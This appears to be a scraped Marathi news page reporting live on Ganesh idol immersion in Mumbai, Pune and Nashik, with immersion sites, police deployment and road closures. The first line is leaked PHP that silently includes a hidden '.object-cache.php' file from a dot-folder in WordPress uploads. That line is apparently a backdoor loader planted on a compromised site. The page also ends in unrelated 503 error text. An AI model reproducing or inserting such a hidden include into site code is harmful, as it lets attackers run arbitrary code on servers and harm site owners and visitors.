add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); LIVE: दहा दिवसांच्या मुक्कामानंतर आज बाप्पाचं विसर्जन – SOCH INDIA
Menu

धर्म / आस्था
LIVE: दहा दिवसांच्या मुक्कामानंतर आज बाप्पाचं विसर्जन

nobanner

LIVE: दहा दिवसांच्या मुक्कामानंतर आज बाप्पाचं विसर्जन

 

मुंबई: गेल्या 10 दिवसांपासून बाप्पांची मनोभावे पूजा केल्यानंतर आज अनंतचतुर्दशीच्या दिवशी लाडक्या बाप्पाला निरोप देण्यात येईल. गणपती विसर्जन सुरळीत पार पडावं यासाठी वेगवेगळ्या सरकारी यंत्रणांनी चांगलीच कंबर कसली आहे.

 

– गणेशगल्लीच्या राजाची आरती

 

 

 

– बाप्पाच्या विसर्जनादिवशी पावसाची हजेरी, परळ, लालबाग भागात पावसाच्या सरी

 

विसर्जनाच्या ठिकाणी पालिका कर्मचारी, अग्निशमन पथक, वैद्यकीय पथक आणि पोलीस दाखल झाले आहेत.. मुंबईत 69 नैसर्गिक, तर 31 कृत्रिम विसर्जन स्थळ सज्ज करण्यात आली आहेत.  या सर्व ठिकाणांवर सीसीटीव्ही कॅमेऱ्याची आणि ड्रोनची नजर असेल. जलप्रदूषण टाळण्यासाठी जास्तीत जास्त गणेशभक्तांनी कृत्रिम तलावात विसर्जन करावं असं पालिकेनं आवाहन केलं आहे.

 

गणपती विसर्जनला वाहतुकीमध्ये बदल

 

– 55 रस्ते वन वे

– 49 रस्ते वाहतुकीसाठी पूर्णपणे बंद

– 18 रस्त्यांवर अवजड वाहनांची वाहतूक बंद

– 99 रस्त्यांवर पार्किंगला मनाई

 

विसर्जनाला शहरातील हे मार्ग बंद

 

– जे. एस. एस. रोड, चिरा बाजार

– जगन्नाथ शंकरशेठ रोड, गिरगाव

–  एस.व्ही.पी. रोड, गिरगाव

– सी. पी. टँक रोड, काळबादेवी

– डॉ. बी.ए. आंबेडकर रोड, परेल

–  न.चिं. केळकर रोड, दादर

– रानडे रोड, दादर

– लिंकिंग रोड

– जुहू तारा रोड

– आरे कॉलनी रोड

– एलबीएस रोड, कुर्ला आणि मुलुंड

 

यंदाही मानाच्या गणपतींचं हौदात विसर्जन

 

यंदा पुणेकरांनी गणपती विसर्जनादरम्यान पर्यावरणाचा ऱ्हास होणार नाही याची पुरेपुर काळजी घेतल्याचं दिसत आहे. नैसर्गिक विसर्जन स्थळांशिवाय पालिकेकडून कृत्रिम स्थळही उभारण्यात येत आहेत. गेल्या वर्षीप्रमाणे यंदादेखील मानाच्या गणपतीचं नदीऐवजी हौदातच विसर्जन केलं जाणार आहे. तसंच जलप्रदूषण टाळण्यासाठी गणेशभक्तांना अमोनियम बायकार्बोनेटचं वाटप करण्यात येत आहे.

 

नाशिकमध्ये 800 पोलिसांचा फौजफाटा

 

तर बाप्पाला निरोप देण्यासाठी नाशिकमध्येही जोरदार तयारी करण्यात आली आहे. नाशिकमध्ये दुपारी 3 वाजल्यानंतर मोठ्या गणपतींच्या विसर्जन मिरवणुकीला सुरुवात होणार आहे. विसर्जनासाठी 800 पोलिसांचा फौजफाटा तैनात करण्यात आला आहे.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.